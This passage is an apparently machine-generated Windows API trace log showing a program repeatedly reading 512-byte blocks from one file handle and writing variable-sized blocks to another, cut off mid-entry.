ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.486] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.487] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.487] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.487] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.488] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.488] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.489] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.490] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.490] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.491] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.491] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.492] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.492] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.493] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1a4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.493] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.494] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x38b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.494] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.495] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.495] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.496] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.496] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.497] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.497] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.498] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.498] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.499] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x96, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.500] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.500] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.501] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.501] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.502] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.502] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.503] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.503] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.504] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3d5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.504] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.505] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.506] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.506] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.507] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.507] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.508] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.508] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.509] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.509] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.510] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xfd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.510] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.511] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.512] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.512] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.513] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.513] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.513] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.514] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.515] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.515] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.516] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.516] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3f2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.517] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.517] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.518] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.518] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.519] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.519] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.520] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.520] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.521] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.522] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.522] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.523] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.523] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.524] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.524] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.525] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x332, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.526] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.527] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.527] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.528] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3b0*, nNumberOfBytesToWrite=0x345, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0 | out: lpBuffer=0x4bd3b0*, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0) returned 1 [0021.528] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.529] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3b0*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0 | out: lpBuffer=0x4bd3b0*, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0) returned 1 [0021.529] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.530] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3b0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0 | out: lpBuffer=0x4bd3b0*, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0) returned 1 [0021.535] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.536] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3b0*, nNumberOfBytesToWrite=0x2fd, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0 | out: lpBuffer=0x4bd3b0*, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0) returned 1 [0021.538] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.539] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x257, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.539] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.540] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x246, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.541] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.542] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x232, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.542] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.543] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.543] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.544] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.544] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.545] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.545] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.546] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, 